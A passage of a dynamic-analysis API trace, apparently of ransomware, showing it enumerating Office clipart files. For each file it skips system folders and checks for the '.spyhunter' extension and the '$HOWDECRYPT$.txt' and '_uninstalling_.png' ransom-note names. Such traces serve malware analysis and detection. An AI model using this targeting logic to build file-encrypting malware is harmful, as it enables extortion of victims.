lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.234] lstrcmpiW (lpString1="J0107148.WMF", lpString2="Windows") returned -1 [0098.234] lstrlenW (lpString="Windows") returned 7 [0098.234] lstrcmpiW (lpString1="J0107148.WMF", lpString2="$Recycle.bin") returned 1 [0098.234] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.234] lstrcmpiW (lpString1="J0107148.WMF", lpString2="System Volume Information") returned -1 [0098.234] lstrlenW (lpString="System Volume Information") returned 25 [0098.234] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 67 [0098.237] StrStrIW (lpFirst="J0107148.WMF", lpSrch=".spyhunter") returned 0x0 [0098.237] lstrcmpW (lpString1="J0107148.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.237] lstrcmpW (lpString1="J0107148.WMF", lpString2="_uninstalling_.png") returned 1 [0098.237] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 67 [0098.237] GetProcessHeap () returned 0x2c0000 [0098.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31d68 [0098.238] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2598) returned 0x2c16890 [0098.238] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.238] lstrcmpiW (lpString1="J0107150.WMF", lpString2="Windows") returned -1 [0098.238] lstrlenW (lpString="Windows") returned 7 [0098.238] lstrcmpiW (lpString1="J0107150.WMF", lpString2="$Recycle.bin") returned 1 [0098.238] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.238] lstrcmpiW (lpString1="J0107150.WMF", lpString2="System Volume Information") returned -1 [0098.238] lstrlenW (lpString="System Volume Information") returned 25 [0098.238] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 67 [0098.238] StrStrIW (lpFirst="J0107150.WMF", lpSrch=".spyhunter") returned 0x0 [0098.238] lstrcmpW (lpString1="J0107150.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.238] lstrcmpW (lpString1="J0107150.WMF", lpString2="_uninstalling_.png") returned 1 [0098.238] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 67 [0098.238] GetProcessHeap () returned 0x2c0000 [0098.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31e38 [0098.238] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25a0) returned 0x2c16890 [0098.238] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.238] lstrcmpiW (lpString1="J0107152.WMF", lpString2="Windows") returned -1 [0098.238] lstrlenW (lpString="Windows") returned 7 [0098.238] lstrcmpiW (lpString1="J0107152.WMF", lpString2="$Recycle.bin") returned 1 [0098.239] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.239] lstrcmpiW (lpString1="J0107152.WMF", lpString2="System Volume Information") returned -1 [0098.239] lstrlenW (lpString="System Volume Information") returned 25 [0098.239] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 67 [0098.239] StrStrIW (lpFirst="J0107152.WMF", lpSrch=".spyhunter") returned 0x0 [0098.239] lstrcmpW (lpString1="J0107152.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.239] lstrcmpW (lpString1="J0107152.WMF", lpString2="_uninstalling_.png") returned 1 [0098.239] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF") returned 67 [0098.239] GetProcessHeap () returned 0x2c0000 [0098.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31f08 [0098.239] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25a8) returned 0x2c16890 [0098.239] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.239] lstrcmpiW (lpString1="J0107154.WMF", lpString2="Windows") returned -1 [0098.239] lstrlenW (lpString="Windows") returned 7 [0098.239] lstrcmpiW (lpString1="J0107154.WMF", lpString2="$Recycle.bin") returned 1 [0098.239] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.239] lstrcmpiW (lpString1="J0107154.WMF", lpString2="System Volume Information") returned -1 [0098.239] lstrlenW (lpString="System Volume Information") returned 25 [0098.239] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 67 [0098.239] StrStrIW (lpFirst="J0107154.WMF", lpSrch=".spyhunter") returned 0x0 [0098.239] lstrcmpW (lpString1="J0107154.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.240] lstrcmpW (lpString1="J0107154.WMF", lpString2="_uninstalling_.png") returned 1 [0098.240] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 67 [0098.240] GetProcessHeap () returned 0x2c0000 [0098.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31fd8 [0098.240] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25b0) returned 0x2c16890 [0098.240] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.240] lstrcmpiW (lpString1="J0107158.WMF", lpString2="Windows") returned -1 [0098.240] lstrlenW (lpString="Windows") returned 7 [0098.240] lstrcmpiW (lpString1="J0107158.WMF", lpString2="$Recycle.bin") returned 1 [0098.240] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.240] lstrcmpiW (lpString1="J0107158.WMF", lpString2="System Volume Information") returned -1 [0098.240] lstrlenW (lpString="System Volume Information") returned 25 [0098.240] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 67 [0098.240] StrStrIW (lpFirst="J0107158.WMF", lpSrch=".spyhunter") returned 0x0 [0098.240] lstrcmpW (lpString1="J0107158.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.240] lstrcmpW (lpString1="J0107158.WMF", lpString2="_uninstalling_.png") returned 1 [0098.240] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 67 [0098.240] GetProcessHeap () returned 0x2c0000 [0098.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c320a8 [0098.240] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25b8) returned 0x2c16890 [0098.240] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.241] lstrcmpiW (lpString1="J0107182.WMF", lpString2="Windows") returned -1 [0098.241] lstrlenW (lpString="Windows") returned 7 [0098.241] lstrcmpiW (lpString1="J0107182.WMF", lpString2="$Recycle.bin") returned 1 [0098.241] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.241] lstrcmpiW (lpString1="J0107182.WMF", lpString2="System Volume Information") returned -1 [0098.241] lstrlenW (lpString="System Volume Information") returned 25 [0098.241] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 67 [0098.241] StrStrIW (lpFirst="J0107182.WMF", lpSrch=".spyhunter") returned 0x0 [0098.241] lstrcmpW (lpString1="J0107182.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.241] lstrcmpW (lpString1="J0107182.WMF", lpString2="_uninstalling_.png") returned 1 [0098.241] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF") returned 67 [0098.241] GetProcessHeap () returned 0x2c0000 [0098.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e180 [0098.242] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25c0) returned 0x2c16890 [0098.242] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.242] lstrcmpiW (lpString1="J0107188.WMF", lpString2="Windows") returned -1 [0098.242] lstrlenW (lpString="Windows") returned 7 [0098.242] lstrcmpiW (lpString1="J0107188.WMF", lpString2="$Recycle.bin") returned 1 [0098.242] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.242] lstrcmpiW (lpString1="J0107188.WMF", lpString2="System Volume Information") returned -1 [0098.242] lstrlenW (lpString="System Volume Information") returned 25 [0098.242] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 67 [0098.242] StrStrIW (lpFirst="J0107188.WMF", lpSrch=".spyhunter") returned 0x0 [0098.242] lstrcmpW (lpString1="J0107188.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.242] lstrcmpW (lpString1="J0107188.WMF", lpString2="_uninstalling_.png") returned 1 [0098.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 67 [0098.242] GetProcessHeap () returned 0x2c0000 [0098.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e250 [0098.242] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25c8) returned 0x2c16890 [0098.242] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.242] lstrcmpiW (lpString1="J0107192.WMF", lpString2="Windows") returned -1 [0098.242] lstrlenW (lpString="Windows") returned 7 [0098.242] lstrcmpiW (lpString1="J0107192.WMF", lpString2="$Recycle.bin") returned 1 [0098.243] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.243] lstrcmpiW (lpString1="J0107192.WMF", lpString2="System Volume Information") returned -1 [0098.243] lstrlenW (lpString="System Volume Information") returned 25 [0098.243] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 67 [0098.243] StrStrIW (lpFirst="J0107192.WMF", lpSrch=".spyhunter") returned 0x0 [0098.243] lstrcmpW (lpString1="J0107192.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.243] lstrcmpW (lpString1="J0107192.WMF", lpString2="_uninstalling_.png") returned 1 [0098.243] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 67 [0098.243] GetProcessHeap () returned 0x2c0000 [0098.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e320 [0098.243] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25d0) returned 0x2c16890 [0098.243] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.243] lstrcmpiW (lpString1="J0107254.WMF", lpString2="Windows") returned -1 [0098.243] lstrlenW (lpString="Windows") returned 7 [0098.243] lstrcmpiW (lpString1="J0107254.WMF", lpString2="$Recycle.bin") returned 1 [0098.243] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.243] lstrcmpiW (lpString1="J0107254.WMF", lpString2="System Volume Information") returned -1 [0098.243] lstrlenW (lpString="System Volume Information") returned 25 [0098.243] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 67 [0098.243] StrStrIW (lpFirst="J0107254.WMF", lpSrch=".spyhunter") returned 0x0 [0098.243] lstrcmpW (lpString1="J0107254.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.244] lstrcmpW (lpString1="J0107254.WMF", lpString2="_uninstalling_.png") returned 1 [0098.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF") returned 67 [0098.244] GetProcessHeap () returned 0x2c0000 [0098.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e3f0 [0098.244] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25d8) returned 0x2c16890 [0098.244] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.244] lstrcmpiW (lpString1="J0107258.WMF", lpString2="Windows") returned -1 [0098.244] lstrlenW (lpString="Windows") returned 7 [0098.244] lstrcmpiW (lpString1="J0107258.WMF", lpString2="$Recycle.bin") returned 1 [0098.244] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.244] lstrcmpiW (lpString1="J0107258.WMF", lpString2="System Volume Information") returned -1 [0098.244] lstrlenW (lpString="System Volume Information") returned 25 [0098.244] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 67 [0098.244] StrStrIW (lpFirst="J0107258.WMF", lpSrch=".spyhunter") returned 0x0 [0098.244] lstrcmpW (lpString1="J0107258.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.244] lstrcmpW (lpString1="J0107258.WMF", lpString2="_uninstalling_.png") returned 1 [0098.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF") returned 67 [0098.244] GetProcessHeap () returned 0x2c0000 [0098.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e4c0 [0098.244] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25e0) returned 0x2c16890 [0098.244] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.245] lstrcmpiW (lpString1="J0107262.WMF", lpString2="Windows") returned -1 [0098.245] lstrlenW (lpString="Windows") returned 7 [0098.245] lstrcmpiW (lpString1="J0107262.WMF", lpString2="$Recycle.bin") returned 1 [0098.245] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.245] lstrcmpiW (lpString1="J0107262.WMF", lpString2="System Volume Information") returned -1 [0098.245] lstrlenW (lpString="System Volume Information") returned 25 [0098.245] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 67 [0098.245] StrStrIW (lpFirst="J0107262.WMF", lpSrch=".spyhunter") returned 0x0 [0098.245] lstrcmpW (lpString1="J0107262.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.245] lstrcmpW (lpString1="J0107262.WMF", lpString2="_uninstalling_.png") returned 1 [0098.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 67 [0098.245] GetProcessHeap () returned 0x2c0000 [0098.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e590 [0098.245] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25e8) returned 0x2c16890 [0098.245] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.245] lstrcmpiW (lpString1="J0107264.WMF", lpString2="Windows") returned -1 [0098.245] lstrlenW (lpString="Windows") returned 7 [0098.245] lstrcmpiW (lpString1="J0107264.WMF", lpString2="$Recycle.bin") returned 1 [0098.245] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.246] lstrcmpiW (lpString1="J0107264.WMF", lpString2="System Volume Information") returned -1 [0098.246] lstrlenW (lpString="System Volume Information") returned 25 [0098.246] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 67 [0098.246] StrStrIW (lpFirst="J0107264.WMF", lpSrch=".spyhunter") returned 0x0 [0098.246] lstrcmpW (lpString1="J0107264.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.246] lstrcmpW (lpString1="J0107264.WMF", lpString2="_uninstalling_.png") returned 1 [0098.246] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 67 [0098.246] GetProcessHeap () returned 0x2c0000 [0098.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e660 [0098.246] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25f0) returned 0x2c16890 [0098.246] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.246] lstrcmpiW (lpString1="J0107266.WMF", lpString2="Windows") returned -1 [0098.246] lstrlenW (lpString="Windows") returned 7 [0098.246] lstrcmpiW (lpString1="J0107266.WMF", lpString2="$Recycle.bin") returned 1 [0098.246] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.246] lstrcmpiW (lpString1="J0107266.WMF", lpString2="System Volume Information") returned -1 [0098.246] lstrlenW (lpString="System Volume Information") returned 25 [0098.246] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 67 [0098.246] StrStrIW (lpFirst="J0107266.WMF", lpSrch=".spyhunter") returned 0x0 [0098.247] lstrcmpW (lpString1="J0107266.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.247] lstrcmpW (lpString1="J0107266.WMF", lpString2="_uninstalling_.png") returned 1 [0098.247] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned 67 [0098.247] GetProcessHeap () returned 0x2c0000 [0098.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e730 [0098.247] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x25f8) returned 0x2c16890 [0098.247] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.247] lstrcmpiW (lpString1="J0107280.WMF", lpString2="Windows") returned -1 [0098.247] lstrlenW (lpString="Windows") returned 7 [0098.247] lstrcmpiW (lpString1="J0107280.WMF", lpString2="$Recycle.bin") returned 1 [0098.247] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.247] lstrcmpiW (lpString1="J0107280.WMF", lpString2="System Volume Information") returned -1 [0098.247] lstrlenW (lpString="System Volume Information") returned 25 [0098.247] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 67 [0098.247] StrStrIW (lpFirst="J0107280.WMF", lpSrch=".spyhunter") returned 0x0 [0098.247] lstrcmpW (lpString1="J0107280.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.247] lstrcmpW (lpString1="J0107280.WMF", lpString2="_uninstalling_.png") returned 1 [0098.247] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned 67 [0098.247] GetProcessHeap () returned 0x2c0000 [0098.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e800 [0098.247] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2600) returned 0x2c16890 [0098.248] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.248] lstrcmpiW (lpString1="J0107282.WMF", lpString2="Windows") returned -1 [0098.248] lstrlenW (lpString="Windows") returned 7 [0098.248] lstrcmpiW (lpString1="J0107282.WMF", lpString2="$Recycle.bin") returned 1 [0098.248] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.248] lstrcmpiW (lpString1="J0107282.WMF", lpString2="System Volume Information") returned -1 [0098.248] lstrlenW (lpString="System Volume Information") returned 25 [0098.248] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 67 [0098.248] StrStrIW (lpFirst="J0107282.WMF", lpSrch=".spyhunter") returned 0x0 [0098.248] lstrcmpW (lpString1="J0107282.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.248] lstrcmpW (lpString1="J0107282.WMF", lpString2="_uninstalling_.png") returned 1 [0098.248] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned 67 [0098.248] GetProcessHeap () returned 0x2c0000 [0098.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e8d0 [0098.248] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2608) returned 0x2c16890 [0098.248] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.248] lstrcmpiW (lpString1="J0107288.WMF", lpString2="Windows") returned -1 [0098.248] lstrlenW (lpString="Windows") returned 7 [0098.248] lstrcmpiW (lpString1="J0107288.WMF", lpString2="$Recycle.bin") returned 1 [0098.248] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.248] lstrcmpiW (lpString1="J0107288.WMF", lpString2="System Volume Information") returned -1 [0098.249] lstrlenW (lpString="System Volume Information") returned 25 [0098.249] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 67 [0098.249] StrStrIW (lpFirst="J0107288.WMF", lpSrch=".spyhunter") returned 0x0 [0098.249] lstrcmpW (lpString1="J0107288.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.249] lstrcmpW (lpString1="J0107288.WMF", lpString2="_uninstalling_.png") returned 1 [0098.249] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 67 [0098.249] GetProcessHeap () returned 0x2c0000 [0098.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1e9a0 [0098.249] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2610) returned 0x2c16890 [0098.249] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.249] lstrcmpiW (lpString1="J0107290.WMF", lpString2="Windows") returned -1 [0098.249] lstrlenW (lpString="Windows") returned 7 [0098.249] lstrcmpiW (lpString1="J0107290.WMF", lpString2="$Recycle.bin") returned 1 [0098.249] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.249] lstrcmpiW (lpString1="J0107290.WMF", lpString2="System Volume Information") returned -1 [0098.249] lstrlenW (lpString="System Volume Information") returned 25 [0098.249] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 67 [0098.249] StrStrIW (lpFirst="J0107290.WMF", lpSrch=".spyhunter") returned 0x0 [0098.249] lstrcmpW (lpString1="J0107290.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.249] lstrcmpW (lpString1="J0107290.WMF", lpString2="_uninstalling_.png") returned 1 [0098.249] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 67 [0098.249] GetProcessHeap () returned 0x2c0000 [0098.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ea70 [0098.250] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2618) returned 0x2c16890 [0098.250] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.250] lstrcmpiW (lpString1="J0107300.WMF", lpString2="Windows") returned -1 [0098.250] lstrlenW (lpString="Windows") returned 7 [0098.250] lstrcmpiW (lpString1="J0107300.WMF", lpString2="$Recycle.bin") returned 1 [0098.250] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.250] lstrcmpiW (lpString1="J0107300.WMF", lpString2="System Volume Information") returned -1 [0098.250] lstrlenW (lpString="System Volume Information") returned 25 [0098.250] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 67 [0098.250] StrStrIW (lpFirst="J0107300.WMF", lpSrch=".spyhunter") returned 0x0 [0098.250] lstrcmpW (lpString1="J0107300.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.250] lstrcmpW (lpString1="J0107300.WMF", lpString2="_uninstalling_.png") returned 1 [0098.250] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 67 [0098.250] GetProcessHeap () returned 0x2c0000 [0098.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1eb40 [0098.250] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2620) returned 0x2c16890 [0098.250] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.250] lstrcmpiW (lpString1="J0107302.WMF", lpString2="Windows") returned -1 [0098.250] lstrlenW (lpString="Windows") returned 7 [0098.251] lstrcmpiW (lpString1="J0107302.WMF", lpString2="$Recycle.bin") returned 1 [0098.251] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.251] lstrcmpiW (lpString1="J0107302.WMF", lpString2="System Volume Information") returned -1 [0098.251] lstrlenW (lpString="System Volume Information") returned 25 [0098.251] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 67 [0098.251] StrStrIW (lpFirst="J0107302.WMF", lpSrch=".spyhunter") returned 0x0 [0098.251] lstrcmpW (lpString1="J0107302.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.251] lstrcmpW (lpString1="J0107302.WMF", lpString2="_uninstalling_.png") returned 1 [0098.251] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 67 [0098.251] GetProcessHeap () returned 0x2c0000 [0098.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ec10 [0098.251] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2628) returned 0x2c16890 [0098.251] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.251] lstrcmpiW (lpString1="J0107308.WMF", lpString2="Windows") returned -1 [0098.251] lstrlenW (lpString="Windows") returned 7 [0098.251] lstrcmpiW (lpString1="J0107308.WMF", lpString2="$Recycle.bin") returned 1 [0098.251] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.251] lstrcmpiW (lpString1="J0107308.WMF", lpString2="System Volume Information") returned -1 [0098.251] lstrlenW (lpString="System Volume Information") returned 25 [0098.251] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, 